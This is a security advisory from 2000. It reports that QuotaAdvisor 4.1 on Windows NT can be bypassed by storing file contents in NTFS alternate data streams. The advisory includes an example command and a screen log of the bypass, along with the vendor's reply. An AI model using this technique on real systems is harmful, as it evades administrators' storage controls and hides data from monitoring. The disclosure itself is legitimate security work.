[ SOURCE: http://www.secureroot.com/security/advisories/9713655354.html ]

============================================================================
    Delphis Consulting Plc
============================================================================

   Security Team Advisories
       [25/09/2000]

    securityteam@delphisplc.com
  [http://www.delphisplc.com/thinking/whitepapers/]

============================================================================
Adv     :       DST2K0037
Title   :       QuotaAdvisor 4.1 by WQuinn is susceptible to alternative
    data streams to bypass quotas.
Author  :       DCIST (securityteam@delphisplc.com)
O/S     :       Microsoft Windows NT 4 Server (SP5)
Product :       QuotaAdvisor 4.1 (Build 450)
Date    :       25/09/2000

I.    Description

II.   Solution

III.  Disclaimer


============================================================================

I. Description
============================================================================

Vendor URL: http://www.wquinn.com/

Delphis Consulting Internet Security Team (DCIST) discovered the following
vulnerability in QuotaAdvisor under Windows NT.

Severity: medium - Bypassing quotas

It is possible to bypass the quotas imposed by QuotaAdvisor by utilising
data streams alternative to the default.

example: cat e:\45mbfile.doc > 0mbfile.doc:hidden

This would enable a 45mb file to appear as if the user is not utilising
their
quota. CAT was taken from the NT Resource KIT.

Explorer & WQuinns space monitor shows the file as 0bytes although the total
amount of free disk space availible does decrease.

example screen log:
I:\quota>copy C:\45mbfile.doc .\
There is not enough space on the disk.
        0 file(s) copied.

I:\quota>cat C:\45mbfile.doc > .\0mbfile.doc:hidden

I:\quota>.\streams .\

.\0mbfile.doc
  45698829  :hidden:$DATA

I:\quota>dir hello.exe
 Volume in drive I has no label.
 Volume Serial Number is C0FA-B4DF

 Directory of I:\quota

09/25/2000  05:49p                    0 0mbfile.doc
               1 File(s)              0 bytes
               0 Dir(s)   1,841,468,928 bytes free


II. Solution
============================================================================

Vendor Status: Informed

Currently there us no known solution to this problem. The following are
the vendors comments in response to our advisory:

"This is a known issue based on a design choice to ignore streams.
We plan in the future to support them."

III. Disclaimer
============================================================================
THE INFORMATION CONTAINED IN THIS ADVISORY IS BELIEVED TO BE ACCURATE AT
THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS GIVEN, EXPRESS OR
IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS.  NEITHER THE AUTHOR NOR THE
PUBLISHER ACCEPTS ANY LIABILITY WHATSOEVER FOR ANY DIRECT, INDIRECT OR
CONSEQUENTIAL LOSS OR DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE
PLACED ON, THIS INFORMATION FOR ANY PURPOSE.
============================================================================